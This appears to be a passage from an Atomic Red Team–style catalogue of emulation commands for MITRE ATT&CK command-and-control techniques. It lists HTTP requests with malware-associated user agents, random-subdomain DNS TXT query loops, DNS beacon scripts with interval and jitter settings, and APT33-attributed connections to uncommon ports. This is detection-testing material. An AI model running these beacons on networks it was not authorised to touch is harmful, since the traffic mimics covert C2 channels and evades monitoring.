    Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
    Invoke-WebRequest www.google.com -UserAgent "*<|>*" | out-null
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    curl -s -A "HttpBrowser/1.0" -m3 www.google.com
    curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com
    curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com
    curl -s -A "*<|>*" -m3 www.google.com
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "TXT" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).example.com" -QuickTimeout}
    for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain example.com -Subdomain atomicredteam -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain example.com -Subdomain #{subdomain} -QueryType TXT
    Set-Location $PathToAtomicsFolder
    .\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType #{query_type}
    ```

    # Actor: APT33
    ## Technique Name: Uncommonly Used Port
    ## Technique Commands

    ```
    test-netconnection -ComputerName google.com -port #{port}
    test-netconnection -ComputerName google.com -port 8081
    telnet google.com #{port}
    telnet google.com 8081
    ```